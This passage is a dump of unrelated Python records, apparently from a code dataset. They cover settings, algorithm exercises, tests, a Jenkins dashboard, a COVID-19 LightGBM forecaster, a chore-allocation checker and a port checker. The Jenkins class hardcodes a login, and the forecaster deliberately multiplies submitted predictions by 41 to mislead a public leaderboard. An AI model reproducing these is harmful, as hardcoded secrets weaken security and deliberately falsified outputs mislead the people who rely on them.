DJANGO-COMPRESSOR ###\n\n#### RAVEN ###\n\nRAVEN_CONFIG = {\n 'dsn': environ.get('RAVEN_DSN'),\n}\n\n### END RAVEN #####","sub_path":"djangobase/settings/prod.py","file_name":"prod.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} 
+{"seq_id":"552974710","text":"x=int(input(\"Podaj liczbe w systemie dwojkowym: \"))\n\nz = 10\na = 0\nb = 0\nwhile z<=x:\n y = x%z\n if z > y and y >= z/10:\n b += 2**a\n a+=1\n z=z*10\n\n\ny = x%z\nif z > y and y >= z/10:\n b+=2**a\n\nprint(\"Liczba ta to: \", b)","sub_path":"lab02/cw_9.py","file_name":"cw_9.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"628943589","text":"# 题目给出一个字符串。要求返回所含字母种类最多为2种的最长子字符串的长度。\n# 方法1: sliding window(队列)+ 字典\n# 思路:从左到右遍历字符串,放入队列中。使用字典记录字母出现的种类和数量。如果出现的种类超过2,则不断从队列中弹出,直到队列中字母的种类\n# 不大于2,此时窗口合法。一直更新合法的窗口长度。\n# 时间复杂度: O(n)每个元素进出队列各1次。\n# 空间复杂度:O(n)给队列\nfrom collections import deque\nclass Solution:\n def lengthOfLongestSubstringTwoDistinct(self, s: str) -> int:\n # 用于建立窗口\n queue = deque()\n # 字典记录窗口的字母种类的数量\n recorder = {}\n # 记录合法窗口的大小\n result = 0\n # 从左到右遍历s\n for letter in s:\n # 不管如何,队列中加入字母\n queue.append(letter)\n # 字典计数器更新\n if letter in recorder:\n recorder[letter] += 1\n else:\n recorder[letter] = 1\n # 如果窗口中字母种类大于2,则一直从窗口左边弹出元素。直到窗口字母数量小于2\n while len(recorder.keys()) > 2:\n popOutLetter = queue.popleft()\n # 弹出的字母计数-1,如果等于0,从计数器删除。\n recorder[popOutLetter] -= 1\n if recorder[popOutLetter] == 0:\n del recorder[popOutLetter]\n\n result = max(result, len(queue))\n return result\n\n# 方法2:sliding window(指针) + 字典\n# 方法2和方法1本质一致。只是用指针而不是队列来表示窗口。\nclass Solution:\n def lengthOfLongestSubstringTwoDistinct(self, s: str) -> int:\n recorder = {}\n result = 0\n left = 0\n for index, element in enumerate(s):\n if element in recorder:\n recorder[element] += 1\n else:\n recorder[element] = 1\n while len(recorder) > 2:\n recorder[s[left]] = recorder[s[left]] - 1\n if recorder[s[left]] == 0:\n del recorder[s[left]]\n left += 1\n result = max(result, index - left + 1)\n return result\n","sub_path":"面试-LeetCode题/基础算法8-滑动窗口(SlidingWindow)/LeetCode159(LongestSubstringwithAtMostTwoDistinctCharacters)/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":2348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"444956376","text":"\n\n\n\ndef frame_as_list():\n \n \n\n prostate = h2o.import_file(path=pyunit_utils.locate(\"smalldata/prostate/prostate.csv.zip\"))\n\n (prostate % 10).show()\n (prostate[4] % 10).show()\n\n\n airlines = h2o.import_file(path=pyunit_utils.locate(\"smalldata/airlines/allyears2k_headers.zip\"))\n\n (airlines[\"CRSArrTime\"] % 100).show()\n\n\nframe_as_list()\n","sub_path":"h2o-py/tests/testdir_munging/binop/pyunit_mod.py","file_name":"pyunit_mod.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"14143677","text":"import random\nlis = []\nfor i in range(20):\n lis.append(random.randint(1, 100))\nprint(lis)\n\n\ndef bubble_sort(arr):\n for i in range(len(arr) - 1):\n for j in range(len(arr) - 1):\n if arr[j] < arr[j + 1]:\n arr[j], arr[j + 1] = arr[j + 1], arr[j]\n\n\nbubble_sort(lis)\nprint(lis)\n","sub_path":"snippets/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"577097129","text":"import datetime\nimport jenkins\nimport json\nfrom rhos_dashboard.repeated_timer import RepeatedTimer\n\n\nclass Rhos(object):\n\n def __init__(self, app, interval):\n self._app = app\n self._timer = RepeatedTimer(interval, self._run)\n self.server = 
jenkins.Jenkins('http://rhos-jenkins.rhev-ci-vms.eng.rdu2.redhat.com', 'dashboard', 'dashboard')\n\n def stop(self):\n self._timer.stop()\n\n def name(self):\n \"\"\"Child class implements this function\"\"\"\n return 'UnknownSampler'\n\n def sample(self):\n \"\"\"Child class implements this function\"\"\"\n return {}\n\n def _send_event(self, widget_id, body):\n body['id'] = widget_id\n body['updatedAt'] = datetime.datetime.now().strftime(\n '%Y-%m-%d %H:%M:%S +0000')\n formatted_json = 'data: %s\\n\\n' % (json.dumps(body))\n self._app.last_events[widget_id] = formatted_json\n for event_queue in self._app.events_queue.values():\n event_queue.put(formatted_json)\n\n def release_status(self, build_result):\n \"\"\"Returns release CI status.\"\"\"\n\n if build_result == 'SUCCESS':\n return 'green'\n elif build_result == 'FAILURE':\n return 'red'\n elif build_result == 'UNSTABLE':\n return 'yellow'\n else:\n return 'error'\n\n def _run(self):\n data = self.run()\n if data:\n self._send_event(self.name(), data)\n","sub_path":"rhos_dashboard/rhos.py","file_name":"rhos.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"533293395","text":"'''@author Samuel Tenka\n'''\n\nimport unittest\nfrom JP2 import JP2\n\nclass TestJP2(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n unittest.TestCase.__init__(self, *args, **kwargs)\n self.rectangle = JP2('testjp2_rectangle.jpg')\n self.diamond = JP2('testjp2_diamond.jpg')\n def assert_weights_close(self, weight, target, area, thresh=0.05):\n error = (weight-target)/float(area)\n print(error)\n self.assertTrue(abs(error) < thresh)\n def test_weights(self):\n w_black_rect = self.rectangle.weight_on(60,60,120,120)\n self.assert_weights_close(w_black_rect, 60*60, 60*60)\n w_white_rect = self.rectangle.weight_on(120,120,180,180)\n self.assert_weights_close(w_white_rect, 0, 60*60)\n w_diamond = self.diamond.weight_on(0,0,256,256)\n self.assert_weights_close(w_diamond, (256*256)/2 - 128*128, 256*256)\n\nif __name__=='__main__':\n unittest.main()\n","sub_path":"code/sam_scratchwork/End2EndRedo/End2End/Base/test_JP2.py","file_name":"test_JP2.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"460515734","text":"from pathlib import Path\nimport lightgbm as lgb\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.preprocessing import LabelEncoder\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\ndata_dir = Path('D:\\\\PythonTests\\\\Testing Kaggle\\\\19\\\\covid19-global-forecasting-week-4\\\\')\nPATH_TRAIN = data_dir/'train.csv'\nPATH_TEST = data_dir/'test.csv'\n#PATH_TRAIN = \"/kaggle/input/covid19-global-forecasting-week-4/train.csv\"\n#PATH_TEST = \"/kaggle/input/covid19-global-forecasting-week-4/test.csv\"\n\nPATH_SUBMISSION = \"submission.csv\"\nPATH_OUTPUT = \"output.csv\"\n\nPATH_REGION_METADATA = data_dir/'region_metadata.csv'\nPATH_REGION_DATE_METADATA = data_dir/'region_date_metadata.csv'\n#PATH_REGION_METADATA = \"/kaggle/input/covid19-forecasting-metadata/region_metadata.csv\"\n#PATH_REGION_DATE_METADATA = \"/kaggle/input/covid19-forecasting-metadata/region_date_metadata.csv\"\n\nVAL_DAYS = 7\nMAD_FACTOR = 0.5\nDAYS_SINCE_CASES = [1, 10, 50, 100, 500, 1000, 5000, 10000]\n\nSEED = 666\n\nLGB_PARAMS = {\"objective\": \"regression\",\n \"num_leaves\": 5,\n \"learning_rate\": 0.013,\n 
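# fractions below 1.0 subsample rows and features per tree, acting as mild regularization\n 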
\"bagging_fraction\": 0.91,\n \"feature_fraction\": 0.81,\n \"reg_alpha\": 0.13,\n \"reg_lambda\": 0.13,\n \"metric\": \"rmse\",\n \"seed\": SEED\n }\n\n \ntrain = pd.read_csv(PATH_TRAIN)\ntest = pd.read_csv(PATH_TEST)\n\n\ntrain = train[train['Country_Region'] == \"Bulgaria\"]\ntest= test[test['Country_Region'] == \"Bulgaria\"]\n\n\nregion_metadata = pd.read_csv(PATH_REGION_METADATA)\nregion_date_metadata = pd.read_csv(PATH_REGION_DATE_METADATA)\n\n\ntrain = train.merge(test[[\"ForecastId\", \"Province_State\", \"Country_Region\", \"Date\"]], on = [\"Province_State\", \"Country_Region\", \"Date\"], how = \"left\")\ntest = test[~test.Date.isin(train.Date.unique())]\n\ndf_panel = pd.concat([train, test], sort = False)\n\n# combining state and country into 'geography'\ndf_panel[\"geography\"] = df_panel.Country_Region.astype(str) + \": \" + df_panel.Province_State.astype(str)\ndf_panel.loc[df_panel.Province_State.isna(), \"geography\"] = df_panel[df_panel.Province_State.isna()].Country_Region\n\n# fixing data issues with cummax\ndf_panel.ConfirmedCases = df_panel.groupby(\"geography\")[\"ConfirmedCases\"].cummax()\ndf_panel.Fatalities = df_panel.groupby(\"geography\")[\"Fatalities\"].cummax()\n\n# merging external metadata\ndf_panel = df_panel.merge(region_metadata, on = [\"Country_Region\", \"Province_State\"])\ndf_panel = df_panel.merge(region_date_metadata, on = [\"Country_Region\", \"Province_State\", \"Date\"], how = \"left\")\n\n# label encoding continent\ndf_panel.continent = LabelEncoder().fit_transform(df_panel.continent)\ndf_panel.Date = pd.to_datetime(df_panel.Date, format = \"%Y-%m-%d\")\n\ndf_panel.sort_values([\"geography\", \"Date\"], inplace = True)\n\n\n## feature engineering\nmin_date_train = np.min(df_panel[~df_panel.Id.isna()].Date)\nmax_date_train = np.max(df_panel[~df_panel.Id.isna()].Date)\n\nmin_date_test = np.min(df_panel[~df_panel.ForecastId.isna()].Date)\nmax_date_test = np.max(df_panel[~df_panel.ForecastId.isna()].Date)\n\nn_dates_test = len(df_panel[~df_panel.ForecastId.isna()].Date.unique())\n\nprint(\"Train date range:\", str(min_date_train), \" - \", str(max_date_train))\nprint(\"Test date range:\", str(min_date_test), \" - \", str(max_date_test))\n\n# creating lag features\nfor lag in range(1, 41):\n df_panel[f\"lag_{lag}_cc\"] = df_panel.groupby(\"geography\")[\"ConfirmedCases\"].shift(lag)\n df_panel[f\"lag_{lag}_ft\"] = df_panel.groupby(\"geography\")[\"Fatalities\"].shift(lag)\n df_panel[f\"lag_{lag}_rc\"] = df_panel.groupby(\"geography\")[\"Recoveries\"].shift(lag)\n\nfor case in DAYS_SINCE_CASES:\n df_panel = df_panel.merge(df_panel[df_panel.ConfirmedCases >= case].groupby(\"geography\")[\"Date\"].min().reset_index().rename(columns = {\"Date\": f\"case_{case}_date\"}), on = \"geography\", how = \"left\")\n\n\n# %% [code]\n## function for preparing features\ndef prepare_features(df, gap):\n \n df[\"perc_1_ac\"] = (df[f\"lag_{gap}_cc\"] - df[f\"lag_{gap}_ft\"] - df[f\"lag_{gap}_rc\"]) / df[f\"lag_{gap}_cc\"]\n df[\"perc_1_cc\"] = df[f\"lag_{gap}_cc\"] / df.population\n \n df[\"diff_1_cc\"] = df[f\"lag_{gap}_cc\"] - df[f\"lag_{gap + 1}_cc\"]\n df[\"diff_2_cc\"] = df[f\"lag_{gap + 1}_cc\"] - df[f\"lag_{gap + 2}_cc\"]\n df[\"diff_3_cc\"] = df[f\"lag_{gap + 2}_cc\"] - df[f\"lag_{gap + 3}_cc\"]\n \n df[\"diff_1_ft\"] = df[f\"lag_{gap}_ft\"] - df[f\"lag_{gap + 1}_ft\"]\n df[\"diff_2_ft\"] = df[f\"lag_{gap + 1}_ft\"] - df[f\"lag_{gap + 2}_ft\"]\n df[\"diff_3_ft\"] = df[f\"lag_{gap + 2}_ft\"] - df[f\"lag_{gap + 3}_ft\"]\n \n df[\"diff_123_cc\"] = 
(df[f\"lag_{gap}_cc\"] - df[f\"lag_{gap + 3}_cc\"]) / 3\n df[\"diff_123_ft\"] = (df[f\"lag_{gap}_ft\"] - df[f\"lag_{gap + 3}_ft\"]) / 3\n\n df[\"diff_change_1_cc\"] = df.diff_1_cc / df.diff_2_cc\n df[\"diff_change_2_cc\"] = df.diff_2_cc / df.diff_3_cc\n \n df[\"diff_change_1_ft\"] = df.diff_1_ft / df.diff_2_ft\n df[\"diff_change_2_ft\"] = df.diff_2_ft / df.diff_3_ft\n\n df[\"diff_change_12_cc\"] = (df.diff_change_1_cc + df.diff_change_2_cc) / 2\n df[\"diff_change_12_ft\"] = (df.diff_change_1_ft + df.diff_change_2_ft) / 2\n \n df[\"change_1_cc\"] = df[f\"lag_{gap}_cc\"] / df[f\"lag_{gap + 1}_cc\"]\n df[\"change_2_cc\"] = df[f\"lag_{gap + 1}_cc\"] / df[f\"lag_{gap + 2}_cc\"]\n df[\"change_3_cc\"] = df[f\"lag_{gap + 2}_cc\"] / df[f\"lag_{gap + 3}_cc\"]\n\n df[\"change_1_ft\"] = df[f\"lag_{gap}_ft\"] / df[f\"lag_{gap + 1}_ft\"]\n df[\"change_2_ft\"] = df[f\"lag_{gap + 1}_ft\"] / df[f\"lag_{gap + 2}_ft\"]\n df[\"change_3_ft\"] = df[f\"lag_{gap + 2}_ft\"] / df[f\"lag_{gap + 3}_ft\"]\n\n df[\"change_123_cc\"] = df[f\"lag_{gap}_cc\"] / df[f\"lag_{gap + 3}_cc\"]\n df[\"change_123_ft\"] = df[f\"lag_{gap}_ft\"] / df[f\"lag_{gap + 3}_ft\"]\n \n for case in DAYS_SINCE_CASES:\n df[f\"days_since_{case}_case\"] = (df[f\"case_{case}_date\"] - df.Date).astype(\"timedelta64[D]\")\n df.loc[df[f\"days_since_{case}_case\"] < gap, f\"days_since_{case}_case\"] = np.nan\n\n df[\"country_flag\"] = df.Province_State.isna().astype(int)\n df[\"density\"] = df.population / df.area\n \n # target variable is log of change from last known value\n df[\"target_cc\"] = np.log1p(df.ConfirmedCases) - np.log1p(df[f\"lag_{gap}_cc\"])\n df[\"target_ft\"] = np.log1p(df.Fatalities) - np.log1p(df[f\"lag_{gap}_ft\"])\n \n features = [\n f\"lag_{gap}_cc\",\n f\"lag_{gap}_ft\",\n f\"lag_{gap}_rc\",\n \"perc_1_ac\",\n \"perc_1_cc\",\n \"diff_1_cc\",\n \"diff_2_cc\",\n \"diff_3_cc\",\n \"diff_1_ft\",\n \"diff_2_ft\",\n \"diff_3_ft\",\n \"diff_123_cc\",\n \"diff_123_ft\",\n \"diff_change_1_cc\",\n \"diff_change_2_cc\",\n \"diff_change_1_ft\",\n \"diff_change_2_ft\",\n \"diff_change_12_cc\",\n \"diff_change_12_ft\",\n \"change_1_cc\",\n \"change_2_cc\",\n \"change_3_cc\",\n \"change_1_ft\",\n \"change_2_ft\",\n \"change_3_ft\",\n \"change_123_cc\",\n \"change_123_ft\",\n \"days_since_1_case\",\n \"days_since_10_case\",\n \"days_since_50_case\",\n \"days_since_100_case\",\n \"days_since_500_case\",\n \"days_since_1000_case\",\n \"days_since_5000_case\",\n \"days_since_10000_case\",\n \"country_flag\",\n \"lat\",\n \"lon\",\n \"continent\",\n \"population\",\n \"area\",\n \"density\",\n \"target_cc\",\n \"target_ft\"\n ]\n \n return df[features]\n\n\n# %% [markdown]\n# ## LGB Model\n# \n\n# %% [code]\n## function for building and predicting using LGBM model\ndef build_predict_lgbm(df_train, df_test, gap):\n \n df_train.dropna(subset = [\"target_cc\", \"target_ft\", f\"lag_{gap}_cc\", f\"lag_{gap}_ft\"], inplace = True)\n \n target_cc = df_train.target_cc\n target_ft = df_train.target_ft\n \n test_lag_cc = df_test[f\"lag_{gap}_cc\"].values\n test_lag_ft = df_test[f\"lag_{gap}_ft\"].values\n \n df_train.drop([\"target_cc\", \"target_ft\"], axis = 1, inplace = True)\n df_test.drop([\"target_cc\", \"target_ft\"], axis = 1, inplace = True)\n \n categorical_features = [\"continent\"]\n \n dtrain_cc = lgb.Dataset(df_train, label = target_cc, categorical_feature = categorical_features)\n dtrain_ft = lgb.Dataset(df_train, label = target_ft, categorical_feature = categorical_features)\n\n model_cc = lgb.train(LGB_PARAMS, train_set = dtrain_cc, 
num_boost_round = 200)\n model_ft = lgb.train(LGB_PARAMS, train_set = dtrain_ft, num_boost_round = 200)\n \n # inverse transform from log of change from last known value\n y_pred_cc = np.expm1(model_cc.predict(df_test, num_boost_round = 200) + np.log1p(test_lag_cc))\n y_pred_ft = np.expm1(model_ft.predict(df_test, num_boost_round = 200) + np.log1p(test_lag_ft))\n \n return y_pred_cc, y_pred_ft, model_cc, model_ft\n\n\n# %% [markdown]\n# ## MAD Model\n# \n\n# %% [code]\n## function for predicting moving average decay model\ndef predict_mad(df_test, gap, val = False):\n \n df_test[\"avg_diff_cc\"] = (df_test[f\"lag_{gap}_cc\"] - df_test[f\"lag_{gap + 3}_cc\"]) / 3\n df_test[\"avg_diff_ft\"] = (df_test[f\"lag_{gap}_ft\"] - df_test[f\"lag_{gap + 3}_ft\"]) / 3\n\n if val:\n y_pred_cc = df_test[f\"lag_{gap}_cc\"] + gap * df_test.avg_diff_cc - (1 - MAD_FACTOR) * df_test.avg_diff_cc * np.sum([x for x in range(gap)]) / VAL_DAYS\n y_pred_ft = df_test[f\"lag_{gap}_ft\"] + gap * df_test.avg_diff_ft - (1 - MAD_FACTOR) * df_test.avg_diff_ft * np.sum([x for x in range(gap)]) / VAL_DAYS\n else:\n y_pred_cc = df_test[f\"lag_{gap}_cc\"] + gap * df_test.avg_diff_cc - (1 - MAD_FACTOR) * df_test.avg_diff_cc * np.sum([x for x in range(gap)]) / n_dates_test\n y_pred_ft = df_test[f\"lag_{gap}_ft\"] + gap * df_test.avg_diff_ft - (1 - MAD_FACTOR) * df_test.avg_diff_ft * np.sum([x for x in range(gap)]) / n_dates_test\n\n return y_pred_cc, y_pred_ft\n\n\n# %% [markdown]\n# ## Modelling\n# \n\n# %% [code]\n## building lag x-days models\ndf_train = df_panel[~df_panel.Id.isna()]\ndf_test_full = df_panel[~df_panel.ForecastId.isna()]\n\ndf_preds_val = []\ndf_preds_test = []\n\nfor date in df_test_full.Date.unique():\n \n print(\"Processing date:\", date)\n \n # ignore date already present in train data\n if date in df_train.Date.values:\n df_pred_test = df_test_full.loc[df_test_full.Date == date, [\"ForecastId\", \"ConfirmedCases\", \"Fatalities\"]].rename(columns = {\"ConfirmedCases\": \"ConfirmedCases_test\", \"Fatalities\": \"Fatalities_test\"})\n \n # multiplying predictions by 41 to not look cool on public LB\n df_pred_test.ConfirmedCases_test = df_pred_test.ConfirmedCases_test * 41\n df_pred_test.Fatalities_test = df_pred_test.Fatalities_test * 41\n else:\n df_test = df_test_full[df_test_full.Date == date]\n \n gap = (pd.Timestamp(date) - max_date_train).days\n \n if gap <= VAL_DAYS:\n val_date = max_date_train - pd.Timedelta(VAL_DAYS, \"D\") + pd.Timedelta(gap, \"D\")\n\n df_build = df_train[df_train.Date < val_date]\n df_val = df_train[df_train.Date == val_date]\n \n X_build = prepare_features(df_build, gap)\n X_val = prepare_features(df_val, gap)\n \n y_val_cc_lgb, y_val_ft_lgb, _, _ = build_predict_lgbm(X_build, X_val, gap)\n y_val_cc_mad, y_val_ft_mad = predict_mad(df_val, gap, val = True)\n \n df_pred_val = pd.DataFrame({\"Id\": df_val.Id.values,\n \"ConfirmedCases_val_lgb\": y_val_cc_lgb,\n \"Fatalities_val_lgb\": y_val_ft_lgb,\n \"ConfirmedCases_val_mad\": y_val_cc_mad,\n \"Fatalities_val_mad\": y_val_ft_mad,\n })\n\n df_preds_val.append(df_pred_val)\n\n X_train = prepare_features(df_train, gap)\n X_test = prepare_features(df_test, gap)\n\n y_test_cc_lgb, y_test_ft_lgb, model_cc, model_ft = build_predict_lgbm(X_train, X_test, gap)\n y_test_cc_mad, y_test_ft_mad = predict_mad(df_test, gap)\n \n if gap == 1:\n model_1_cc = model_cc\n model_1_ft = model_ft\n features_1 = X_train.columns.values\n elif gap == 14:\n model_14_cc = model_cc\n model_14_ft = model_ft\n features_14 = X_train.columns.values\n elif gap 
== 28:\n model_28_cc = model_cc\n model_28_ft = model_ft\n features_28 = X_train.columns.values\n\n df_pred_test = pd.DataFrame({\"ForecastId\": df_test.ForecastId.values,\n \"ConfirmedCases_test_lgb\": y_test_cc_lgb,\n \"Fatalities_test_lgb\": y_test_ft_lgb,\n \"ConfirmedCases_test_mad\": y_test_cc_mad,\n \"Fatalities_test_mad\": y_test_ft_mad,\n })\n \n df_preds_test.append(df_pred_test)\n\n\n# %% [markdown]\n# ## Validation\n# \n\n# %% [code]\n## validation score\ndf_panel = df_panel.merge(pd.concat(df_preds_val, sort = False), on = \"Id\", how = \"left\")\ndf_panel = df_panel.merge(pd.concat(df_preds_test, sort = False), on = \"ForecastId\", how = \"left\")\n\nrmsle_cc_lgb = np.sqrt(mean_squared_error(np.log1p(df_panel[~df_panel.ConfirmedCases_val_lgb.isna()].ConfirmedCases), np.log1p(df_panel[~df_panel.ConfirmedCases_val_lgb.isna()].ConfirmedCases_val_lgb)))\nrmsle_ft_lgb = np.sqrt(mean_squared_error(np.log1p(df_panel[~df_panel.Fatalities_val_lgb.isna()].Fatalities), np.log1p(df_panel[~df_panel.Fatalities_val_lgb.isna()].Fatalities_val_lgb)))\n\nrmsle_cc_mad = np.sqrt(mean_squared_error(np.log1p(df_panel[~df_panel.ConfirmedCases_val_mad.isna()].ConfirmedCases), np.log1p(df_panel[~df_panel.ConfirmedCases_val_mad.isna()].ConfirmedCases_val_mad)))\nrmsle_ft_mad = np.sqrt(mean_squared_error(np.log1p(df_panel[~df_panel.Fatalities_val_mad.isna()].Fatalities), np.log1p(df_panel[~df_panel.Fatalities_val_mad.isna()].Fatalities_val_mad)))\n\nprint(\"LGB CC RMSLE Val of\", VAL_DAYS, \"days for CC:\", round(rmsle_cc_lgb, 2))\nprint(\"LGB FT RMSLE Val of\", VAL_DAYS, \"days for FT:\", round(rmsle_ft_lgb, 2))\nprint(\"LGB Overall RMSLE Val of\", VAL_DAYS, \"days:\", round((rmsle_cc_lgb + rmsle_ft_lgb) / 2, 2))\nprint(\"\\n\")\nprint(\"MAD CC RMSLE Val of\", VAL_DAYS, \"days for CC:\", round(rmsle_cc_mad, 2))\nprint(\"MAD FT RMSLE Val of\", VAL_DAYS, \"days for FT:\", round(rmsle_ft_mad, 2))\nprint(\"MAD Overall RMSLE Val of\", VAL_DAYS, \"days:\", round((rmsle_cc_mad + rmsle_ft_mad) / 2, 2))\n\n\ndf_test = df_panel.loc[~df_panel.ForecastId.isna(), [\"ForecastId\", \"Country_Region\", \"Province_State\", \"Date\",\n \"ConfirmedCases_test\", \"ConfirmedCases_test_lgb\", \"ConfirmedCases_test_mad\",\n \"Fatalities_test\", \"Fatalities_test_lgb\", \"Fatalities_test_mad\"]].reset_index()\n\ndf_test[\"ConfirmedCases\"] = 0.41 * df_test.ConfirmedCases_test_lgb + 0.59 * df_test.ConfirmedCases_test_mad\ndf_test[\"Fatalities\"] = 0.41 * df_test.Fatalities_test_lgb + 0.59 * df_test.Fatalities_test_mad\n\n# Since LGB models don't predict these countries well\ndf_test.loc[df_test.Country_Region.isin([\"China\", \"US\", \"Diamond Princess\"]), \"ConfirmedCases\"] = df_test[df_test.Country_Region.isin([\"China\", \"US\", \"Diamond Princess\"])].ConfirmedCases_test_mad.values\ndf_test.loc[df_test.Country_Region.isin([\"China\", \"US\", \"Diamond Princess\"]), \"Fatalities\"] = df_test[df_test.Country_Region.isin([\"China\", \"US\", \"Diamond Princess\"])].Fatalities_test_mad.values\n\ndf_test.loc[df_test.Date.isin(df_train.Date.values), \"ConfirmedCases\"] = df_test[df_test.Date.isin(df_train.Date.values)].ConfirmedCases_test.values\ndf_test.loc[df_test.Date.isin(df_train.Date.values), \"Fatalities\"] = df_test[df_test.Date.isin(df_train.Date.values)].Fatalities_test.values\n\ndf_submission = df_test[[\"ForecastId\", \"ConfirmedCases\", \"Fatalities\"]]\ndf_submission.ForecastId = df_submission.ForecastId.astype(int)\n\ndf_submission\n\n\ndf_submission.to_csv(PATH_SUBMISSION, index = 
False)\ndf_test.to_csv(PATH_OUTPUT, index = False)\n","sub_path":"Testing Kaggle/19/covid19-global-forecasting-week-4/LGB and Model Enrichment.py","file_name":"LGB and Model Enrichment.py","file_ext":"py","file_size_in_byte":16012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"480127760","text":"import random\nfrom itertools import product, combinations\nfrom copy import copy\n\nfrom wolframclient.evaluation import WolframLanguageSession\nfrom wolframclient.language import wl, wlexpr\nsession = WolframLanguageSession()\n\n\n\narrays = []\n\ncomb_behavior = {}\n\ndef pareto_dominates(new_val, old_val):\n\tfailed = False\n\treallyGained = False\n\tfor player in range(players):\n\t\tif new_val[player] < old_val[player]:\n\t\t\tfailed = True\n\t\telif new_val[player] > old_val[player]:\n\t\t\treallyGained = True\n\n\treturn reallyGained and not failed\n\n\nplayers = 3\n\nall_pairs = []\n\nfor comb in combinations([i for i in range(players)], 2):\n\tpair_list = [i for i in comb]\n\tpair_list_r = copy(pair_list)\n\tpair_list_r.reverse()\n\tall_pairs.append(pair_list)\n\tall_pairs.append(pair_list_r)\n\nitems = 6\nall_combs = [item for item in product([i for i in range(players)], repeat=items)]\n\nrandom.shuffle(all_combs)\n\nefx_combs = []\nvaluations = {0: [-1, -0.6875, -0.22916666666666666, -0.16666666666666666, -0.4166666666666667, -0.6041666666666666], 1: [-1, -3.375, -2, -2.625, -0.5, -3.25], 2: [-1, -3, -1, -3.5, -3.625, -3.875]}\n\n\nall_zeros = [0 for j in range(items)]\n\n\nfor comb in all_combs:\n\tall_poss_j = []\n\tisAlreadyJealous = False\n\tfor pair in all_pairs:\n\t\tside1_items = []\n\t\tside2_items = []\n\t\tfor i in range(len(comb)):\n\t\t\tif comb[i] == pair[0]:\n\t\t\t\tside1_items.append(i)\n\t\t\telif comb[i] == pair[1]:\n\t\t\t\tside2_items.append(i)\n\t\tval_side2 = 0\n\t\tfor side2_item in side2_items:\n\t\t\tval_side2 += valuations[pair[0]][side2_item]\n\t\tfor j in range(len(side1_items)):\n\t\t\tval_side1 = 0\n\t\t\tfor side1_item in (side1_items[:j] + side1_items[j+1:]):\n\t\t\t\tval_side1 += valuations[pair[0]][side1_item]\n\n\t\t\tif val_side2 > val_side1:\n\t\t\t\tisAlreadyJealous = True\n\n\n\n\tif isAlreadyJealous == False:\n\t\tefx_combs.append(comb)\n\nefx_valuations = []\nfor comb in efx_combs:\n\tnew_val = []\n\tfor player in range(players):\n\t\tplayer_value = 0\n\t\tfor elem_ind in range(len(comb)):\n\t\t\tif comb[elem_ind] == player:\n\t\t\t\tplayer_value += valuations[player][elem_ind]\n\n\t\tnew_val.append(player_value)\n\tefx_valuations.append([new_val, comb])\n\n#print(efx_valuations)\n#print(efx_combs)\n\nold_efx_valuations = copy(efx_valuations)\n\nprint(\"All EFX Valuations: {}\".format(old_efx_valuations))\nfor comb in all_combs:\n\tnew_val = []\n\tfor player in range(players):\n\t\tplayer_value = 0\n\t\tfor elem_ind in range(len(comb)):\n\t\t\tif comb[elem_ind] == player:\n\t\t\t\tplayer_value += valuations[player][elem_ind]\n\n\t\tnew_val.append(player_value)\n\n\tnew_efx_valuations = []\n\tfor e_val, e_comb in efx_valuations:\n\t\tif not pareto_dominates(new_val, e_val):\n\t\t\tnew_efx_valuations.append([e_val, e_comb])\n\t\t#else:\n\t\t#\tprint(\"EFX comb {} with values {} superseded by {} due to combination {}\".format(e_comb, e_val, new_val, comb))\n\tefx_valuations = new_efx_valuations\n\tif efx_valuations == []:\n\t\tprint(\"REALLY??\")\n\t\timport pdb\n\t\tpdb.set_trace()\nprint(\"EFX+PO Valuations: {}\".format(efx_valuations))\nmax_ev = 0\nev_instance = []\nfor ev in 
old_efx_valuations:\n\tif sum(ev[0]) > max_ev:\n\t\tmax_ev = sum(ev[0])\n\t\tev_instance = ev\n\nprint(\"MAX {}, {}\".format(max_ev, ev_instance))\n\nimport pdb\npdb.set_trace()\n","sub_path":"efx_chores/check_po_example.py","file_name":"check_po_example.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"333081014","text":"#!/usr/bin/env python\n\"\"\"Check if given network ports are open\n\"\"\"\nimport sys\nimport socket\nfrom contextlib import closing\n\ndef check_socket(host, *ports):\n \"\"\"check if given network ports are open\n Args:\n host (str): host address\n ports (int): ports to check\n \"\"\"\n\n result = {'open_ports': [], 'closed_ports': []}\n\n for port in ports:\n with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:\n if sock.connect_ex((host, int(port))) == 0:\n result['open_ports'].append(port)\n else:\n result['closed_ports'].append(port)\n print(\"open ports: {open_ports}, \"\n \"closed ports: {closed_ports}\".format(**result))\n\n if not result['closed_ports']:\n exit_code = 0\n elif not result['open_ports']:\n exit_code = 2\n else:\n exit_code = 1\n\n sys.exit(exit_code)\n\n\nif __name__ == '__main__':\n check_socket(sys.argv[1], *sys.argv[2:])\n","sub_path":"check_ports.py","file_name":"check_ports.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
